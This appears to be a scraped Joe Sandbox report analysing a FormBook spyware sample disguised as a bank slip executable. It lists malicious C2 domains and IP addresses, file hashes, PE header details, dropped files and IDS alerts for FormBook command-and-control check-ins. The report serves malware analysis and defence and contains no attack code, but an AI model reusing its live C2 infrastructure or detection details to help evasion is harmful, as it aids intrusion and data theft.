                                                                                                    http://www.jiyu-kobo.co.jp/PO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://www.fontbureau.com/designers8PO1268931024 - Bank Slip.exe, 00000000.00000002.1782324341.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://tempuri.org/DatabaseWalletDataSet.xsdPO1268931024 - Bank Slip.exefalse
                                                                                                      unknown
                                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=colorcpl.exe, 00000007.00000003.2169231678.0000000008468000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      • No. of IPs < 25%
                                                                                                      • 25% < No. of IPs < 50%
                                                                                                      • 50% < No. of IPs < 75%
                                                                                                      • 75% < No. of IPs
                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                      141.193.213.10
                                                                                                      www.meanttobebroken.orgUnited States
                                                                                                      396845DV-PRIMARY-ASN1UStrue
                                                                                                      162.0.215.244
                                                                                                      prediksipreman.fyiCanada
                                                                                                      35893ACPCAtrue
                                                                                                      13.248.169.48
                                                                                                      www.ila.beautyUnited States
                                                                                                      16509AMAZON-02UStrue
                                                                                                      162.0.231.203
                                                                                                      www.givora.siteCanada
                                                                                                      22612NAMECHEAP-NETUStrue
                                                                                                      38.88.82.56
                                                                                                      www.college-help.infoUnited States
                                                                                                      174COGENT-174UStrue
                                                                                                      178.79.184.196
                                                                                                      gucciqueen.shopUnited Kingdom
                                                                                                      63949LINODE-APLinodeLLCUStrue
                                                                                                      188.114.96.3
                                                                                                      www.timizoasisey.shopEuropean Union
                                                                                                      13335CLOUDFLARENETUStrue
                                                                                                      103.71.154.12
                                                                                                      www.2925588.comHong Kong
                                                                                                      132325LEMON-AS-APLEMONTELECOMMUNICATIONSLIMITEDHKtrue
                                                                                                      199.59.243.227
                                                                                                      www.rebel.tiendaUnited States
                                                                                                      395082BODIS-NJUStrue
                                                                                                      84.32.84.32
                                                                                                      xtelify.techLithuania
                                                                                                      33922NTT-LT-ASLTtrue
                                                                                                      3.33.130.190
                                                                                                      7fh27o.vipUnited States
                                                                                                      8987AMAZONEXPANSIONGBtrue
                                                                                                      8.210.3.99
                                                                                                      jexiz.shopSingapore
                                                                                                      45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                      Analysis ID:1539142
                                                                                                      Start date and time:2024-10-22 09:03:08 +02:00
                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                      Overall analysis duration:0h 10m 15s
                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                      Report type:full
                                                                                                      Cookbook file name:default.jbs
                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                      Number of analysed new started processes analysed:9
                                                                                                      Number of new started drivers analysed:0
                                                                                                      Number of existing processes analysed:0
                                                                                                      Number of existing drivers analysed:0
                                                                                                      Number of injected processes analysed:1
                                                                                                      Technologies:
                                                                                                      • HCA enabled
                                                                                                      • EGA enabled
                                                                                                      • AMSI enabled
                                                                                                      Analysis Mode:default
                                                                                                      Analysis stop reason:Timeout
                                                                                                      Sample name:PO1268931024 - Bank Slip.exe
                                                                                                      Detection:MAL
                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@7/2@15/12
                                                                                                      EGA Information:
                                                                                                      • Successful, ratio: 100%
                                                                                                      HCA Information:
                                                                                                      • Successful, ratio: 97%
                                                                                                      • Number of executed functions: 120
                                                                                                      • Number of non-executed functions: 323
                                                                                                      Cookbook Comments:
                                                                                                      • Found application associated with file extension: .exe
                                                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                      • VT rate limit hit for: PO1268931024 - Bank Slip.exe
                                                                                                      TimeTypeDescription
                                                                                                      03:04:07API Interceptor1x Sleep call for process: PO1268931024 - Bank Slip.exe modified
                                                                                                      03:05:06API Interceptor10698804x Sleep call for process: colorcpl.exe modified
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      141.193.213.10http://www.gofreight.com/Get hashmaliciousUnknownBrowse
                                                                                                      • www.gofreight.com/
                                                                                                      http://www.trayak.comGet hashmaliciousUnknownBrowse
                                                                                                      • trayak.com/
                                                                                                      http://tacinc.orgGet hashmaliciousUnknownBrowse
                                                                                                      • www.tacinc.org/
                                                                                                      https://exclusive.thechosenadventures.com/unlock/?otreset=false&otpreview=true&otgeo=gbGet hashmaliciousUnknownBrowse
                                                                                                      • thechosenadventures.com/
                                                                                                      http://mycoitracking.comGet hashmaliciousUnknownBrowse
                                                                                                      • mycoitracking.com/
                                                                                                      http://howardstallings.comGet hashmaliciousUnknownBrowse
                                                                                                      • howardstallings.com/
                                                                                                      eqqjbbjMlt.elfGet hashmaliciousUnknownBrowse
                                                                                                      • materialdistrict.com/
                                                                                                      http://toptalentusa.comGet hashmaliciousUnknownBrowse
                                                                                                      • toptalentusa.com/
                                                                                                      http://amspecgroup.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                      • amspecgroup.com/
                                                                                                      http://www.expopass.comGet hashmaliciousUnknownBrowse
                                                                                                      • www.expopass.com/
                                                                                                      162.0.215.244http://mirchmasala2go.comGet hashmaliciousUnknownBrowse
                                                                                                      • mirchmasala2go.com/
                                                                                                      13.248.169.48Request for 30 Downpayment.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                      • www.discountprice.shop/dmec/
                                                                                                      request-BPp -RFQ 0975432.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                      • www.3808.app/4do9/
                                                                                                      NOXGUARD AUS 40 UREA__912001_NOR_EN - MSDS.exeGet hashmaliciousUnknownBrowse
                                                                                                      • www.3808.app/4do9/
                                                                                                      PR. No.1599-Rev.2.exeGet hashmaliciousUnknownBrowse
                                                                                                      • www.moneta.life/qzre/
                                                                                                      lByv6mqTCJ.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.comedy.finance/mwd0/
                                                                                                      3wgZ0nlbTe.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.invicta.world/0cd8/
                                                                                                      RFQ REF-JTCAJC-QINHP5-TIS-L0009- (AL DHAFRA) AL JABER - SUPPLY.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.invicta.world/0cd8/
                                                                                                      ROQ_972923.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.catholic.today/1u6c/
                                                                                                      PO#001498.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.catholic.today/gs9g/
                                                                                                      lWfpGAu3ao.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.comedy.finance/e21k/
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      www.timizoasisey.shopPR. No.1599-Rev.2.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 188.114.96.3
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      NAMECHEAP-NETUSrHSBCBank_Paymentswiftcpy.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 162.213.249.216
                                                                                                      la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 162.0.239.54
                                                                                                      https://fochap-fcbdd2.ingress-alpha.ewp.live/wp-content/plugins/Wetransfert/Get hashmaliciousUnknownBrowse
                                                                                                      • 162.255.118.65
                                                                                                      https://coosby-d84564.ingress-earth.ewp.live/wp-content/plugins/deviswetransfer%202/log.phpGet hashmaliciousUnknownBrowse
                                                                                                      • 63.250.43.129
                                                                                                      ekte.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 162.0.238.246
                                                                                                      rDebitadvice22_10_2024.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 162.0.229.222
                                                                                                      arm4.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 162.0.234.179
                                                                                                      https://sites.google.com/view/hffgshfgsqfgsqf/homeGet hashmaliciousUnknownBrowse
                                                                                                      • 162.255.118.66
                                                                                                      http://hotautodetail.com/goe-=bleass=america=donal=q82h-=1Get hashmaliciousUnknownBrowse
                                                                                                      • 68.65.122.217
                                                                                                      890927362736.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                      • 162.0.225.218
                                                                                                      ACPCAceTv2SnPn9.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 162.22.97.189
                                                                                                      Payment-Inv.exeGet hashmaliciousDarkCloudBrowse
                                                                                                      • 162.55.60.2
                                                                                                      bin.armv7l.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 162.32.169.42
                                                                                                      la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 162.66.100.20
                                                                                                      arm4.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 162.34.81.107
                                                                                                      r0000000NT_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 162.0.215.33
                                                                                                      ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 162.52.209.59
                                                                                                      Price Inquiry.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 162.0.213.94
                                                                                                      NjjLYnPSZr.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 162.0.213.72
                                                                                                      bSgEe4v0It.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 162.48.169.211
                                                                                                      AMAZON-02USfile.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                      • 13.32.99.17
                                                                                                      la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 52.40.53.215
                                                                                                      la.bot.powerpc.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 18.243.123.69
                                                                                                      bin.x86_64.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                      • 52.46.196.110
                                                                                                      la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 99.81.3.171
                                                                                                      la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 34.222.39.85
                                                                                                      rHSBCBank_Paymentswiftcpy.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 54.67.87.110
                                                                                                      la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 52.35.74.193
                                                                                                      la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 18.145.226.37
                                                                                                      la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 52.17.252.32
                                                                                                      DV-PRIMARY-ASN1UShttps://click.pstmrk.it/3s/tldr.tech%2Fconfirmed%3Femail%3Djames.ward%2540gerflor.com%26newsletter%3Dinfosec/pEGE/grO4AQ/AQ/de2d9b1d-a87c-40b3-97e7-314a53573877/2/GfrX-GFLqnGet hashmaliciousHTMLPhisherBrowse
                                                                                                      • 141.193.213.20
                                                                                                      https://stacksports.captainu.comGet hashmaliciousUnknownBrowse
                                                                                                      • 141.193.213.20
                                                                                                      https://krebsonsecurity.com/2024/10/patch-tuesday-october-2024-editionGet hashmaliciousUnknownBrowse
                                                                                                      • 141.193.213.11
                                                                                                      http://www.gofreight.com/Get hashmaliciousUnknownBrowse
                                                                                                      • 141.193.213.10
                                                                                                      http://pub-ba5a046c69974217b0431bca4ba43740.r2.dev/rep.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                      • 141.193.213.20
                                                                                                      http://pub-682ad3b65d944376b919745aae3c56d4.r2.dev/document14.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                      • 141.193.213.21
                                                                                                      http://pub-ce2d0679453d4fa48743eacb8ce0cf4e.r2.dev/log.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                      • 141.193.213.21
                                                                                                      http://pub-945293ef7a9047adb26d2ddd47a2d837.r2.dev/cpanel.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                      • 141.193.213.20
                                                                                                      https://cedars-sinai-enterprise.dicomgrid.com/worklist/Get hashmaliciousUnknownBrowse
                                                                                                      • 141.193.213.21
                                                                                                      https://hblitigation-news.com/Get hashmaliciousUnknownBrowse
                                                                                                      • 141.193.213.11
                                                                                                      No context
                                                                                                      No context
                                                                                                      Process:C:\Users\user\Desktop\PO1268931024 - Bank Slip.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1216
                                                                                                      Entropy (8bit):5.34331486778365
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                      Malicious:true
                                                                                                      Reputation:high, very likely benign file
                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                      Process:C:\Windows\SysWOW64\colorcpl.exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                      Category:dropped
                                                                                                      Size (bytes):114688
                                                                                                      Entropy (8bit):0.9746603542602881
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                      Malicious:false
                                                                                                      Reputation:high, very likely benign file
                                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                      Entropy (8bit):7.93748742510879
                                                                                                      TrID:
                                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                      • Windows Screen Saver (13104/52) 0.07%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                      File name:PO1268931024 - Bank Slip.exe
                                                                                                      File size:762'880 bytes
                                                                                                      MD5:1fcde6f41117bdc978a69990608ecc69
                                                                                                      SHA1:e8724b7ed145e838303d0b1bb393c8f3545ad567
                                                                                                      SHA256:ee843bcf3bcd091101e9d641670be54dd9c3a2733ad3e248c29eb7e2a667c1d4
                                                                                                      SHA512:59ce09953d91e60ae0fb87ee3eb53e3488893103e790b5ce836b2f8a69ea69ad356f9f2615b105908c19c52b83f4a225b5bf589c6e30c6e68a617dcd912f5f11
                                                                                                      SSDEEP:12288:wBnkhMOoltiJO9kijsXfkaCWta49LvCdR2n+kMOslUkgNMk8Nae6TY:wBnkh5oDiJ/XfkaCt4v1y6GT6U
                                                                                                      TLSH:CFF4135032DC1F69DABE5BFA58F0906403FA94476491FB0D9DC321FB8A79B068A20F57
                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C.................0.................. ........@.. ....................................@................................
                                                                                                      Icon Hash:90cececece8e8eb0
                                                                                                      Entrypoint:0x4bb796
                                                                                                      Entrypoint Section:.text
                                                                                                      Digitally signed:false
                                                                                                      Imagebase:0x400000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                      Time Stamp:0xFF0DE143 [Fri Aug 7 14:48:35 2105 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:4
                                                                                                      OS Version Minor:0
                                                                                                      File Version Major:4
                                                                                                      File Version Minor:0
                                                                                                      Subsystem Version Major:4
                                                                                                      Subsystem Version Minor:0
                                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                      Instruction
                                                                                                      jmp dword ptr [00402000h]
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xbb7440x4f.text
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xbc0000x63c.rsrc
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xbe0000xc.reloc
                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0xb901c0x70.text
                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                      .text0x20000xb979c0xb980081f5ecae691f8e0466b51f7d1cc5542bFalse0.9466523121630728data7.944994526598998IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                      .rsrc0xbc0000x63c0x8006ab73b51048d2e439285a4238fb05bb5False0.3427734375data3.5186488621643277IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .reloc0xbe0000xc0x200a51093747dffe8c2ea60846b8cfd3f34False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                      RT_VERSION0xbc0900x3acdata0.42340425531914894
                                                                                                      RT_MANIFEST0xbc44c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                                      DLLImport
                                                                                                      mscoree.dll_CorExeMain
                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                      2024-10-22T09:04:43.729668+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4497413.33.130.19080TCP
                                                                                                      2024-10-22T09:04:59.705684+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449742141.193.213.1080TCP
                                                                                                      2024-10-22T09:05:02.264534+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449745141.193.213.1080TCP
                                                                                                      2024-10-22T09:05:04.799928+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449756141.193.213.1080TCP
                                                                                                      2024-10-22T09:05:07.345040+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449771141.193.213.1080TCP
                                                                                                      2024-10-22T09:05:13.412511+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4498038.210.3.9980TCP
                                                                                                      2024-10-22T09:05:15.959389+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4498198.210.3.9980TCP
                                                                                                      2024-10-22T09:05:18.490658+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4498338.210.3.9980TCP
                                                                                                      2024-10-22T09:05:21.053266+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4498468.210.3.9980TCP
                                                                                                      2024-10-22T09:05:27.248638+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449882162.0.215.24480TCP
                                                                                                      2024-10-22T09:05:29.601890+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449898162.0.215.24480TCP
                                                                                                      2024-10-22T09:05:32.175115+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449909162.0.215.24480TCP
                                                                                                      2024-10-22T09:05:34.718238+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449925162.0.215.24480TCP
                                                                                                      2024-10-22T09:05:40.537782+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449956162.0.231.20380TCP
                                                                                                      2024-10-22T09:05:43.070431+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449972162.0.231.20380TCP
                                                                                                      2024-10-22T09:05:45.873181+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449987162.0.231.20380TCP
                                                                                                      2024-10-22T09:05:48.203740+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449997162.0.231.20380TCP
                                                                                                      2024-10-22T09:05:54.350123+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450023103.71.154.1280TCP
                                                                                                      2024-10-22T09:05:56.912642+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450025103.71.154.1280TCP
                                                                                                      2024-10-22T09:05:59.459609+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450026103.71.154.1280TCP
                                                                                                      2024-10-22T09:06:02.209670+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450027103.71.154.1280TCP
                                                                                                      2024-10-22T09:06:08.017467+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500283.33.130.19080TCP
                                                                                                      2024-10-22T09:06:10.565534+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500293.33.130.19080TCP
                                                                                                      2024-10-22T09:06:13.096862+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500303.33.130.19080TCP
                                                                                                      2024-10-22T09:06:22.737616+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4500313.33.130.19080TCP
                                                                                                      2024-10-22T09:06:29.303442+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500323.33.130.19080TCP
                                                                                                      2024-10-22T09:06:31.850424+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500333.33.130.19080TCP
                                                                                                      2024-10-22T09:06:34.397177+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500343.33.130.19080TCP
                                                                                                      2024-10-22T09:06:36.063840+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4500353.33.130.19080TCP
                                                                                                      2024-10-22T09:06:41.819332+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450036199.59.243.22780TCP
                                                                                                      2024-10-22T09:06:44.330414+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450037199.59.243.22780TCP
